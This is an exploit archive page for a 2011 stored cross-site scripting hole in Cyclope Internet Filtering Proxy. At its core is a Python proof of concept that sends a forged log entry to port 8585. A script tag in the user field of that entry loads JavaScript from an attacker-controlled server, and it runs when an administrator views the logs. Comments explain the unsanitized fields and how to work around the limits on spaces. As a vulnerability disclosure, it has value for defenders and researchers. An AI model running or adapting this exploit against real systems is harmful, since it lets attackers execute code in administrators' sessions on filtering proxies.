what you don't know can hurt you

Cyclope Internet Filtering Proxy Cross Site Scripting

Cyclope Internet Filtering Proxy Cross Site Scripting
Posted Oct 20, 2011
Authored by loneferret

Cyclope Internet Filtering Proxy suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
MD5 | 8fe9605bc18d7889a21fdbe1e6dac2af

Cyclope Internet Filtering Proxy Cross Site Scripting

Change Mirror Download
#!/usr/bin/python

# Title: Cyclope Internet Filtering Proxy - Stored XSS Vuln.
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Software link: http://www.cyclope-series.com/download/index.aspx?p=2

# Date Found: Oct 20th 2011
# Tested on: Windows XP SP3 Professional / Windows Server 2008 R2 Standard
# Tested with: Registered and Unregistered versions
# Nod to the Exploit-DB Team

# The Cyclope Internet Filtering Proxy is your basic white & black list website navigation filtering app.
# It will log all of the client's activities such as visited web sites, the time etc.
# There's an optional client application if the administrator wishes to acquire the computer name and user
# information.

# This XSS vulnerability is due to the fact that nothing is sanitized in the web-based management console.
# The whitelist and blacklist patterns, for example, are vulnerable. As well as computer name and user fields
# gathered via the logging port.
# This PoC takes advantage of the "user" field (but also works with computer feild). One needs to send in the correct order:
# <user>USER</user><computer>COMPUTER</computer><ip>IP ADDY</ip>\n to the default log port 8585.
# None of these fileds are sanitized. So it's making this XSS a bit more interesing.
# Atacking machine doesn't need the Cyclope client app installed.
# Limited in what can be sent, a space will screw up any code you send. The HTML code &nbsp; will usually fix that problem,
# as well as all the other HTML codes for quotes and so on.
# So we can remotely inserted our evil XSS, and have it executed when the administrator looks over the logs.

# As always, if anyone wants to take this PoC to the next level, be my guest.
# Have fun,
# loneferret

import struct
import socket

# Remember to enter a webserver with a js file
buffer = "<user><SCRIPT/SRC=http://xxx.xxx.xxx.xxx/xss.js></SCRIPT></user><computer>Windows</computer><ip>2.2.2.2</ip>\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "\nSending evil buffer..."
s.connect(('xxx.xxx.xxx.xxx',8585)) #Enter Cyclope server IP address
s.send(buffer)
s.close()
print "\nDone! "

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close